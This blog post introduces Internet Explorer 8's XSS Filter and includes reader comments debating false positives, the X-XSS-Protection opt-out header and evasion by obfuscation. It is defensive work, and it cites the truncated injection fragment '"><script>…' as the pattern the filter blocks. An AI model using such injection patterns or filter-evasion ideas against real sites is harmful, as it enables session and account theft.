IE8 Security Part IV: The XSS Filter

Hi, I'm David Ross, Security Software Engineer on the SWI team. I’m proud to be doing this guest post on the IE blog today to show off some of the collaborative work SWI is doing with the Internet Explorer team.

Today we are releasing some details on a new IE8 feature that makes reflected / “Type-1” Cross-Site Scripting (XSS) vulnerabilities much more difficult to exploit from within Internet Explorer 8. Type-1 XSS flaws represent a growing portion of overall reported vulnerabilities and are increasingly being exploited “for fun and profit.”

The number of reported XSS flaws in popular web sites has skyrocketed recently – MITRE has reported that XSS vulnerabilities are now the most frequently reported class of vulnerability. More recently, sites such as XSSed.com have begun to collect and publish tens of thousands of Type-1 XSS vulnerabilities present in sites across the web.

XSS vulnerabilities enable an attacker to control the relationship between a user and a web site or web application that they trust. Cross-site scripting can enable attacks such as:

Cookie theft, including the theft of sessions cookies that can lead to account hijacking

Monitoring keystrokes input to the victim web site / application

Performing actions on the victim web site on behalf of the victim user. For example, an XSS attack on Windows Live Mail might enable an attacker to read and forward e-mail messages, set new calendar appointments, etc.

While many great tools exist for developers to mitigate XSS in their sites / applications, these tools do not satisfy the need for average users to protect themselves from XSS attacks as they browse the web.

XSS Filter -- How it Works

The XSS Filter operates as an IE8 component with visibility into all requests / responses flowing through the browser. When the filter discovers likely XSS in a cross-site request, it identifies and neuters the attack if it is replayed in the server’s response. Users are not presented with questions they are unable to answer – IE simply blocks the malicious script from executing.

With the new XSS Filter, IE8 Beta 2 users encountering a Type-1 XSS attack will see a notification like the following:

The page has been modified and the XSS attack is blocked.

In this case the XSS Filter has identified a cross-site scripting attack in the URL. It has neutered this attack as the identified script was replayed back into the response page. In this way the filter is effective without modifying an initial request to the server or blocking an entire response.

As you may imagine, there are a number of interesting and subtle scenarios that the filter must handle appropriately. Here are some examples:

The filter must be effective even if the attack is adjusted to leverage artifacts of common web application frameworks. Ex: Will an attack still be detected if certain characters in a request are dropped or translated when replayed in the response?

In performing filtering our code must not introduce new attack scenarios that would not otherwise exist. Ex: Imagine the filter can be forced to neuter a closing SCRIPT tag. In that case, untrusted content on the page might then execute as script.

Compatibility is critical. This feature was developed with the understanding that if it were to “break the web,” we could not enable the feature by default. Or if we did, people would turn it off and get no benefit. We really want to provide as much value as possible to the maximum number of users.

Web developers may wish to disable the filter for their content. They can do so by setting a HTTP header: X-XSS-Protection: 0

Ultimately we have taken a very pragmatic approach – we choose to not to build the filter in such a way that we compromise site compatibility. Thus, the XSS Filter defends against the most common XSS attacks but it is not, and will never be, an XSS panacea. This is similar to the pragmatic approach taken by ASP.Net request validation, although the XSS Filter is able to be more aggressive than the ASP.Net feature.

Assuming negligible site compatibility and performance impact, the fact that our filter effectively blocks the common “><script>… pattern we see most frequently in Type-1 XSS attacks is inherently a step forward. Pushing that further and blocking other common cases of reflected XSS where possible, as the XSS Filter does, is extra goodness.

Caveats aside, it will be great to see the tens of thousands of publicly disclosed Type-1 XSS vulnerabilities indexed on sites like XSSed.com simply stop working in IE8. (Not to mention the IFRAME SEO Poisoning attacks we protect against as well!)

I will go into more details on how the filter works, its history, its limitations, and some lessons learned during the development process over on my blog in the coming weeks.

Please keep in mind that this information bar isn’t a ~prompt~ that asks the user to make a security decision, this is a ~notification~ that a security protection was activated. The notice is shown to help IT Admins and Web Developers troubleshoot any XSS Filter-related page modification.

It’s quite unlikely that any user will see this information bar in the course of normal browsing.

Suggesting to set a proprietary HTTP header may seem to be a nice opt-out but may leave your site vulnerable to other real XSS exploits that you may want to see blocked by IE. Besides, if every software vendor should choose to suggest this kind of opt-out we finally end up sending kilobytes of HTTP headers just to suit every software vendor on the block – many of which are known to make mistakes with their ‘security features’.

My fear is that with every ‘possible attack vector’ Microsoft wants to mitigate the number of false positives will rise. Hopefully the implementation will be somewhat smarter than f.i. the ‘bad content’ filter used for MSN…

First a recent warning from McAfee — if you’re still using IE 6, it’s time to upgrade. From SecurityNewsPortal.com: Anyone using Internet Explorer 6 should upgrade to the latest version of the browser, IE7, to avoid security risks. A researcher…

Why the choice for modifying a page, instead of blocking the request all together? it only increases the chance of circumvention. IMHO regarding reflected XSS, all URI’s and/or querystrings containing HTML should be blocked because I am not aware of such legitimate use whatsoever in any application.

"Maybe I’m missing something obvious, but if web developers can disable this filtering by using "X-XSS-Protection: 0", what’s stopping the bad guys from doing the same?"

This is inserted as a header, which is MUCH more difficult for a third party to insert into (your website has done something exceptionally bad if they can do so). XSS is trivial, header injection reflected back to the client, not so much.

As for the false positives, I suspect the false positives will predominantly be on poorly written websites that ARE vulnerable. If parameters in the URL are being echoed back in the html without entity encoding the website is poorly designed and XSS does exist, even if a specific URL actually functions the way the developer intended.

Ryan: Yes, JoshBw is correct. Header injection attacks are MUCH less common than script-injection attacks via XSS, by orders of magnitude at least. If a bad guy is able to inject new custom headers in your browser, XSS is the least of your worries as chances are good that he could entirely replace the page. Joshbw is also correct to note that most false positives aren’t false positives as all, but actually evidence of potential for future exploit.

rvdh: Compatibility is key. It’s somewhat non-intuitive, but think about it: your car is fast because it has brakes (because then you can slow down when you need to). In the same way, the investment we made in compatibility lets us have very aggressive heuristics, because even in the event of a false match, chances are good that the resulting page will not be broken. Hence, we are able to catch more XSS attacks. There are many legitimate uses of URLs that contain potential scripting constructs. In the extreme example, consider a site that allows the user to share sample Javascript with other users. If we were to block all outbound script, then such a site would be impossible to build, even though the site (if properly coded) had no XSS vulnerabilities. So, as you can see, our ability to block the attacks only (without harming non-attack sites) means that we can keep the XSS filter enabled and aggressive.

@Darko: There’s no meaningful performance degradation for the sites you mention, as the filter only fires in the event of cross-domain navigations, and only then in very rare cases. As described previously, the feature was designed around compatibility, because minimizing false positives is key to ensuring that users are able to benefit from the protections of this feature.

@Tino: You can report false positives to us through the "Report broken website" tool or even email me directly (ericlaw at microsoft) although, as noted, most false-positives are actually proof of latent exploitability. It’s possible to build a contrived site that deliberately fires false-positives, but it’s easy to avoid these without actually turning the feature off via the header.

@Eric: Thanks for the explanation, although I doubt that my webbrowser of choice has such a "Report broken website" feature 😉

My fear is based on actual experience with tools by anti-virus vendors which try to do the same: we have been listed as an ‘untrusted site’ because some mallware-propagating site was ‘only’ 3 clicks removed from some link in our content, parts of our javascripts have been blocked because it contained the phrase ‘ads’ and recently we have seen a large number of bogus requests on our site because some anti-virus vendor is prefetching links from Google search-results with a certain depth, but completely disregards <base href>…

That’s why I’m sceptable to any of these efforts because it seems that as a site-owner you are declared ‘guilty’ unless you can prove your own innocence, and it sometimes takes a lot of time before you’re being rectified…

Well I do think it’s a very good idea, if a developer uses MSIE to test his site, he immediately sees that something is broken, and probably will fix it. So, it can be very helpful to get rid of XSS all together and be an educational tool for surfers as well for developers.

However I’m still for blocking the request all together instead of modifying it and raise a warning. I am not sure how it gets modified, but it could lead to other attacks as well, because re-writing Javascript never really worked quite well in filters. All filters I know about had at least one flaw concerning re-writing content that opened up new vectors.

I’m wondering how well this filter deals with obfuscation of code, which has been shown in the past to be one of the harder parts of getting a decent xss filter made. It’s great that this has been implemented, but if the filter only goes 1-2 levels of obfuscation deep then there’s probably more work to be done.

I can already picture this as a new strong reason/excuse for programmers not to get educated on secure programming, relying on this feature. Speaking from a security consultant standpoint, its already hard enough to explain devs why a fix is neccesary. Ie is just a -choice-.